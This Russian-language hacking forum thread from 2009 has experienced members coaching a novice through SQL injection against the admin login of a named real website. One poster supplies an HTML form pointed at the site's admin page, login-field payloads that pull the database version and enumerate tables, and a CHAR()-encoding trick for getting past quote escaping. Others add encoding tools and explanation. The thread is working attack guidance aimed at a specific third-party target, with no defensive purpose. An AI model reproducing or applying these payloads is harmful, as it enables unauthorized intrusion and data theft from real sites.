HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.01.2009, 18:16
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию

2 BloodyMessage and kevmen
Уточняю, в большинстве подобных случаев никто никого не фильтрует...
Просто на сервере стоит magic_quotes=on, т.е. экранирование кавычек, засчет чего запрос к базе содержащий кавычки портится лишними слешами и поэтому результат запроса возвращает ошибку...
Доходчиво объяснил?
 
Ответить с цитированием

  #2  
Старый 23.01.2009, 18:19
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Gemini12, сделай такой скриптик:

Код:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>
и вбивай в поле "Логин":

' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

Дальше разберёшься?
 
Ответить с цитированием

  #3  
Старый 23.01.2009, 18:28
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

Цитата:
Сообщение от groundhog  
Gemini12, сделай такой скриптик:

Код:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>
и вбивай в поле "Логин":

' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

Дальше разберёшься?
Чето не совсем понял куда этот скрипт девать
Не мог бы кинуть ссылочку на статейку про этот способ, или объясни ) заранее благодарен...
 
Ответить с цитированием

  #4  
Старый 23.01.2009, 18:27
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами: 9227224

Репутация: 60
По умолчанию

Iceangel_,спасибо!Я до этого понять не мог,почему при вводе новостей содержащих кавычки происходило экранирование,благодарю за объяснение!=)

Gemini12,какая таблица значений еще??
кодировщик-декодировщик
http://paulschou.com/tools/xlate/
ищи тут

Последний раз редактировалось kevmen; 23.01.2009 в 18:30..
 
Ответить с цитированием

  #5  
Старый 23.01.2009, 18:28
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Gemini12
закодировать в чар можно здесь
http://www.webfuture.ru/igo/convert.php
 
Ответить с цитированием

  #6  
Старый 23.01.2009, 18:33
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--
 
Ответить с цитированием

  #7  
Старый 23.01.2009, 19:02
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

Цитата:
Сообщение от groundhog  
Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--
А что зашифровал?
 
Ответить с цитированием

  #8  
Старый 23.01.2009, 18:34
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Gemini12, создай у себя HTML файл с тем содержимым что я тебе написал...
 
Ответить с цитированием

  #9  
Старый 23.01.2009, 18:57
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

Все! Понял! Благодарю!
 
Ответить с цитированием

  #10  
Старый 23.01.2009, 19:05
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Ну ты же таблицы перебираешь? Выбрал таблицу с именем 'test' значит на следующий раз тебе нужно её отбросить, вот ты её таким образом шифруешь и пишешь в условии WHERE ... ... ... ... AND table_name!=CHAR(...)+CHAR(...)+CHAR(...)+CHAR(... ). Где в CHAR отдельные ASCII коды букв - t, e, s и t.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.